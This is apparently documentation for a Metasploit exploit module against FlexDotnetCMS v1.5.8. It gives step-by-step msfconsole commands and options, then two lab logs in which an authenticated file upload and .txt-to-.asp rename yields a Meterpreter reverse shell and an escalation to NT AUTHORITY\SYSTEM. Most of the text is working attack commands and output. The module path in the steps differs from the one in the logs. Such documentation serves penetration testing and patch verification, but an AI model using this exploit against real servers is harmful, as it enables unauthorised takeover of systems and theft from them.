1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/multi/http/FlexDotnetCMS_upload_exec`
4. Do: `set RHOSTS [IP]`
5. Do: `set USERNAME [username for the FlexDotnetCMS account]`
6. Do: `set PASSWORD [password for the FlexDotnetCMS account]`
7. Do: `set target [target]`
8. Do: `set payload [payload]`
9. Do: `set LHOST [IP]`
10. Do: `exploit`

## Options
### PASSWORD
The password for the FlexDotnetCMS account to authenticate with.
### TARGETURI
The base path to FlexDotnetCMS. The default value is `/`.
### USERNAME
The username for the FlexDotnetCMS account to authenticate with. The default value is `admin`.

## Targets
```
Id  Name
--  ----
0   Windows (x86)
1   Windows (x64)
```

## Scenarios
### FlexDotnetCMS v1.5.8 running on Windows Server 2012 - Windows x86 target
```
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > show options
Module options (exploit/windows/http/flexdotnetcms_upload_exec):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   Password1        yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.230    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      1113             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to FlexDotnetCMS
   USERNAME   admin            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.128    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Windows (x86)
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to FlexDotnetCMS
[*] FlexDotnetCMS is installed on the target at C:/Users/Administrator/Desktop/FlexDotnetCMS-1.5.8/
[*] Uploaded test file wxoI7s6knq.txt. Attempting to rename the file to wxoI7s6knq.asp...
[+] Successfully renamed test file wxoI7s6knq.txt to wxoI7s6knq.asp (this is a copy of wxoI7s6knq.txt, which remains on the server)
[+] The target is vulnerable. Target is FlexDotnetCMS v1.5.8 or lower.
[*] Renaming wxoI7s6knq.txt to wxoI7s6knq.asp again, this time adding the payload
[+] Successfully added the ASP payload to wxoI7s6knq.asp
[*] Executing the payload...
[*] Sending stage (175174 bytes) to 192.168.1.230
[*] Meterpreter session 9 opened (192.168.1.128:4444 -> 192.168.1.230:62058) at 2020-11-02 11:10:41 -0500
[+] Successfully deleted wxoI7s6knq.txt
[+] Successfully deleted wxoI7s6knq.asp
meterpreter > getuid
Server username: WIN-S623VF4MJDR\Administrator
meterpreter > getsystem 
ge...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
tmeterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
### FlexDotnetCMS v1.5.8 running on Windows Server 2012 - Windows x64 target
```
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to FlexDotnetCMS
[*] FlexDotnetCMS is installed on the target at C:/Users/Administrator/Desktop/FlexDotnetCMS-1.5.8/
[*] Uploaded test file XLz3OTusi.txt. Attempting to rename the file to XLz3OTusi.asp...
[+] Successfully renamed test file XLz3OTusi.txt to XLz3OTusi.asp (this is a copy of XLz3OTusi.txt, which remains on the server)
[+] The target is vulnerable. Target is FlexDotnetCMS v1.5.8 or lower.
[*] Renaming XLz3OTusi.txt to XLz3OTusi.asp again, this time adding the payload
[+] Successfully added the ASP payload to XLz3OTusi.asp
[*] Executing the payload...
[*] Sending stage (200262 bytes) to 192.168.1.230
[*] Meterpreter session 10 opened (192.168.1.128:4444 -> 192.168.1.230:62059) at 2020-11-02 11:10:55 -0500
[+] Successfully deleted XLz3OTusi.txt
[+] Successfully deleted XLz3OTusi.asp
meterpreter > getuid
Server username: WIN-S623VF4MJDR\Administrator
meterpreter >
```